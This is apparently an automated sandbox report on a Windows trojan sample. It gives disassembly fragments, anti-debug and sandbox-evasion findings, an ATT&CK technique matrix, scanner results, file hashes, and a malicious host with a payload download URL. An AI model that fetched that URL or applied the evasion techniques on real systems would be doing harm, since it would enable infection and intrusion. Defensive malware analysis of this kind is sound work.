      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov eax, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov eax, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov eax, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov eax, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A4E62 mov eax, dword ptr fs:[00000030h]4_2_1D8A4E62
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88EE78 mov eax, dword ptr fs:[00000030h]4_2_1D88EE78
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80CE70 mov eax, dword ptr fs:[00000030h]4_2_1D80CE70
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D807E71 mov eax, dword ptr fs:[00000030h]4_2_1D807E71
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FAE89 mov eax, dword ptr fs:[00000030h]4_2_1D7FAE89
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FAE89 mov eax, dword ptr fs:[00000030h]4_2_1D7FAE89
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FBE80 mov eax, dword ptr fs:[00000030h]4_2_1D7FBE80
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6970 mov eax, dword ptr fs:[00000030h]4_2_1D7D6970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6970 mov eax, dword ptr fs:[00000030h]4_2_1D7D6970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6970 mov eax, dword ptr fs:[00000030h]4_2_1D7D6970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6970 mov eax, dword ptr fs:[00000030h]4_2_1D7D6970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6970 mov eax, dword ptr fs:[00000030h]4_2_1D7D6970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6970 mov eax, dword ptr fs:[00000030h]4_2_1D7D6970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6970 mov eax, dword ptr fs:[00000030h]4_2_1D7D6970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80C98F mov eax, dword ptr fs:[00000030h]4_2_1D80C98F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80C98F mov eax, dword ptr fs:[00000030h]4_2_1D80C98F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80C98F mov eax, dword ptr fs:[00000030h]4_2_1D80C98F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E096B mov eax, dword ptr fs:[00000030h]4_2_1D7E096B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E096B mov eax, dword ptr fs:[00000030h]4_2_1D7E096B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7F4955 mov eax, dword ptr fs:[00000030h]4_2_1D7F4955
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7F4955 mov eax, dword ptr fs:[00000030h]4_2_1D7F4955
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DB950 mov eax, dword ptr fs:[00000030h]4_2_1D7DB950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DB950 mov ecx, dword ptr fs:[00000030h]4_2_1D7DB950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DB950 mov eax, dword ptr fs:[00000030h]4_2_1D7DB950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DB950 mov eax, dword ptr fs:[00000030h]4_2_1D7DB950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DB950 mov eax, dword ptr fs:[00000030h]4_2_1D7DB950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DB950 mov eax, dword ptr fs:[00000030h]4_2_1D7DB950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D85F9AA mov eax, dword ptr fs:[00000030h]4_2_1D85F9AA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D85F9AA mov eax, dword ptr fs:[00000030h]4_2_1D85F9AA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8089B0 mov edx, dword ptr fs:[00000030h]4_2_1D8089B0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FE94E mov eax, dword ptr fs:[00000030h]4_2_1D7FE94E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FD940 mov eax, dword ptr fs:[00000030h]4_2_1D7FD940
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FD940 mov eax, dword ptr fs:[00000030h]4_2_1D7FD940
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D85D9C7 mov eax, dword ptr fs:[00000030h]4_2_1D85D9C7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A29CF mov eax, dword ptr fs:[00000030h]4_2_1D8A29CF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A29CF mov eax, dword ptr fs:[00000030h]4_2_1D8A29CF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7F9938 mov ecx, dword ptr fs:[00000030h]4_2_1D7F9938
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CB931 mov eax, dword ptr fs:[00000030h]4_2_1D7CB931
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CB931 mov eax, dword ptr fs:[00000030h]4_2_1D7CB931
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88D9C6 mov eax, dword ptr fs:[00000030h]4_2_1D88D9C6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C7917 mov eax, dword ptr fs:[00000030h]4_2_1D7C7917
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8049F0 mov eax, dword ptr fs:[00000030h]4_2_1D8049F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8049F0 mov eax, dword ptr fs:[00000030h]4_2_1D8049F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FB9FA mov eax, dword ptr fs:[00000030h]4_2_1D7FB9FA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C99F0 mov ecx, dword ptr fs:[00000030h]4_2_1D7C99F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D09F0 mov eax, dword ptr fs:[00000030h]4_2_1D7D09F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D826912 mov eax, dword ptr fs:[00000030h]4_2_1D826912
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe Code function: 4_2_1D812D10 NtQuerySystemInformation,LdrInitializeThunk, 4_2_1D812D10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe"
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe Code function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_0040352D
      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | 1 Native API | 1 Windows Service | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
      Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Windows Service | 11 Virtualization/Sandbox Evasion | LSASS Memory | 11 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | 11 Process Injection | 1 Access Token Manipulation | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | 1 DLL Side-Loading | 11 Process Injection | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 113 Application Layer Protocol | SIM Card Swap | - | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 14 System Information Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Obfuscated Files or Information | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Timestomp | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
      Source | Detection | Scanner | Label
      SecuriteInfo.com.W32.AIDetect.malware2.5627.exe | 19% | Virustotal | -
      SecuriteInfo.com.W32.AIDetect.malware2.5627.exe | 12% | ReversingLabs | Win32.Trojan.Shelsy

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Temp\System.Runtime.CompilerServices.VisualC.dll | 0% | Metadefender | -
      C:\Users\user\AppData\Local\Temp\System.Runtime.CompilerServices.VisualC.dll | 0% | ReversingLabs | -
      C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll | 3% | Metadefender | -
      C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll | 0% | ReversingLabs | -
      C:\Users\user\AppData\Local\Temp\uninstalla.exe | 0% | Metadefender | -
      C:\Users\user\AppData\Local\Temp\uninstalla.exe | 0% | ReversingLabs | -
      C:\Users\user\AppData\Local\Temp\vm3dc003.dll | 0% | ReversingLabs | -

      No Antivirus matches

      Source | Detection | Scanner | Label
      hustlecreate.com | 0% | Virustotal | -

      Source | Detection | Scanner | Label
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 0% | Virustotal | -
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 0% | Avira URL Cloud | safe
      https://hustlecreate.com/a1/binned_SsGEV34.bin | 0% | Avira URL Cloud | safe
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 0% | Avira URL Cloud | safe
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | 0% | Avira URL Cloud | safe
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | 0% | Avira URL Cloud | safe
      https://hustlecreate.com/a1/binned_SsGEV34.bin42 | 0% | Avira URL Cloud | safe
      http://www.gopher.ftp://ftp. | 0% | Avira URL Cloud | safe
      https://hustlecreate.com/a1/binned_SsGEV34.binY | 0% | Avira URL Cloud | safe
      https://hustlecreate.com/ | 0% | Avira URL Cloud | safe
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      hustlecreate.com | 69.49.244.14 | true | true | - | unknown

      Name | Malicious | Antivirus Detection | Reputation
      https://hustlecreate.com/a1/binned_SsGEV34.bin | true | Avira URL Cloud: safe | unknown
      Name | Source | Malicious | Antivirus Detection | Reputation
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205792493541.00000000005F2000.00000008.00000001.01000000.00000005.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
      http://www.vmware.com/0 | vm3dc003.dll.2.dr | false | - | high
      http://www.symauth.com/rpa00 | SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.dr | false | - | high
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmp | false | Avira URL Cloud: safe | unknown
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205792493541.00000000005F2000.00000008.00000001.01000000.00000005.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.vmware.com/0/ | SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.dr | false | - | high
      https://github.com/dotnet/runtimeBSJB | System.Runtime.CompilerServices.VisualC.dll.2.dr | false | - | high
      https://hustlecreate.com/a1/binned_SsGEV34.bin42 | SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649574538.0000000001978000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://nsis.sf.net/NSIS_ErrorError | SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, uninstalla.exe.2.dr | false | - | high
      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD | SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205792807270.0000000000626000.00000008.00000001.01000000.00000005.sdmp | false | - | high
      http://www.gopher.ftp://ftp. | SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.symauth.com/cps0( | SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.dr | false | - | high
      https://hustlecreate.com/a1/binned_SsGEV34.binY | SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649574538.0000000001978000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://github.com/dotnet/runtime | System.Runtime.CompilerServices.VisualC.dll.2.dr | false | - | high
      https://hustlecreate.com/ | SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649574538.0000000001978000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649475257.0000000001964000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
      69.49.244.14 | hustlecreate.com | United States | - | 46606 | UNIFIEDLAYER-AS-1US | true
      Joe Sandbox Version: 34.0.0 Boulder Opal
      Analysis ID: 634994
      Start date and time: 27/05/2022 09:50:56 (2022-05-27 09:50:56 +02:00)
      Joe Sandbox Product: CloudBasic
      Overall analysis duration: 0h 14m 23s
      Hypervisor based Inspection enabled: false
      Report type: full
      Sample file name: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
      Cookbook file name: default.jbs
      Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
      Run name: Suspected Instruction Hammering
      Number of analysed new started processes analysed: 14
      Number of new started drivers analysed: 0
      Number of existing processes analysed: 0
      Number of existing drivers analysed: 0
      Number of injected processes analysed: 0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode: default
      Analysis stop reason: Timeout
      Detection: MAL
      Classification: mal84.troj.evad.winEXE@3/11@1/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 14.6% (good quality ratio 14%)
      • Quality average: 81%
      • Quality standard deviation: 25.4%
      HCA Information:
      • Successful, ratio: 96%
      • Number of executed functions: 56
      • Number of non-executed functions: 84
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Adjust boot time
      • Enable AMSI
      • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wdcpalt.microsoft.com, client.wns.windows.com, ctldl.windowsupdate.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      Time | Type | Description
      09:52:50 | API Interceptor | 1x Sleep call for process: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe modified
                      No context
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      UNIFIEDLAYER-AS-1USuoWaH0S2pE8lVyP.exeGet hashmaliciousBrowse
                      • 192.185.121.61
                      https://gilbertogil.com.br/Feedback1.phpGet hashmaliciousBrowse
                      • 162.241.226.70
                      https://www.evernote.com/shard/s670/sh/55910dd8-9887-4018-3dce-75c372206cc5/1536ce86c6cb14e023f30a8fc3201040Get hashmaliciousBrowse
                      • 69.49.247.60
                      Win32.Wannacry.dllGet hashmaliciousBrowse
                      • 162.146.153.136
                      https://nathanu.tk/.well-known/wp-content/smp/excelz/index.php&design=DAFBx6CPpccGet hashmaliciousBrowse
                      • 162.240.53.128
                      DOCUMENTO 97314542.xlsGet hashmaliciousBrowse
                      • 162.214.98.126
                      RFQ OM - RFQ No. OM-1267-V .exeGet hashmaliciousBrowse
                      • 142.4.0.135
                      SecuriteInfo.com.Trojan.DownloaderNET.290.19373.exeGet hashmaliciousBrowse
                      • 74.220.219.216
                      SecuriteInfo.com.Exploit.Rtf.Obfuscated.64.25308.rtfGet hashmaliciousBrowse
                      • 69.49.231.213
                      RH-1900171460.xlsbGet hashmaliciousBrowse
                      • 192.185.211.19
                      SecuriteInfo.com.W32.AIDetectNet.01.28145.exeGet hashmaliciousBrowse
                      • 192.185.96.179
                      http://bit.do/fUj2gGet hashmaliciousBrowse
                      • 50.87.233.13
                      SecuriteInfo.com.Variant.Strictor.269399.17280.exeGet hashmaliciousBrowse
                      • 192.185.136.135
                      https://heylink.me/gshdj/Get hashmaliciousBrowse
                      • 192.185.195.200
                      RH-1026234360.xlsbGet hashmaliciousBrowse
                      • 192.185.211.19
                      RH-3138609257.xlsbGet hashmaliciousBrowse
                      • 192.185.211.19
                      SecuriteInfo.com.Heur.MSIL.Benin.5.31453.exeGet hashmaliciousBrowse
                      • 162.241.60.19
                      http://khelowars.com/Get hashmaliciousBrowse
                      • 162.215.222.33
                      RH-1825560422.xlsbGet hashmaliciousBrowse
                      • 192.185.211.19
                      proforma invoice pdf.exeGet hashmaliciousBrowse
                      • 192.185.112.181
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):402254
                                                                          Entropy (8bit):7.791539989948347
                                                                          Encrypted:false
                                                                          SSDEEP:12288:TmJZJW5QhS/VQ40QP6BE4xUARC9LsfQu2aNFtcb:ThQSVQ4SxUARC9LsfQu2aNFtw
                                                                          MD5:F042FA6C1A5A11E1E94F4C7D55F4696F
                                                                          SHA1:3A9C3519A67FD03DC3C97EEA6B04CFFD1AA38715
                                                                          SHA-256:B30D6EBFBD48675A3899E47EA4FEFD63A784CF4D291CE1CE7E805B70BB71D67D
                                                                          SHA-512:775821F4D105DED3FD6294F16640745180A40D2327EA965B325D528E31C3F8C3A1DF7CB8A28AFDA43D383264220E89EF5FAE1CD447FA44478F2C90D8DD37A983
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):32
                                                                          Entropy (8bit):4.663909765557392
                                                                          Encrypted:false
                                                                          SSDEEP:3:Ve4KXOHXRWLkmt:LKesLkQ
                                                                          MD5:272BC34712948F6A7132DD80E17DE84E
                                                                          SHA1:461967EA55D874C28BF0999FB66CACE785D9BCA9
                                                                          SHA-256:019D3E92BF00DC7409E188A19F11AB33C31BFBAFE5B2E036632CC69B71207FE9
                                                                          SHA-512:56BE026C1DCA3326CFC165244E9F0AA6278E779D003BBD9405E4A18408B00B3AB3CBC5B779D4A315EEA43278C306AC307121BB007112A70BEC2B6CDFEE06C958
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:[GORKUN]..Workbags141=REFRACTS..
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                                                          Category:dropped
                                                                          Size (bytes):10115
                                                                          Entropy (8bit):7.896422756961018
                                                                          Encrypted:false
                                                                          SSDEEP:192:oXRIG87sv/m1vnKaVSuKRXL55hOuf4dXL9J0LEvJyVVcuJ6Sj7YvKvtOJ:KRIjsW1vKPXBgdiWMEMj7YyvG
                                                                          MD5:2F12A714A50993C090C94EC2672490E1
                                                                          SHA1:4F9A319C412F1B1B251C027B1C2448BBDBB9CA6F
                                                                          SHA-256:E759639DCCA8E96864BC82EDBACFD5BB14FE37412A6F3FCE7C82BF1BB944B6E4
                                                                          SHA-512:2B349EAB24DCCE0DBD36433DE13E0B2A551E88A626D5C9A3F68B79E21ACDE4FC238DD4E280E30ACBB76B0EB0E08CE1ACC233AB1C9E2147E2DD01E0917B3A376B
                                                                          Malicious:false
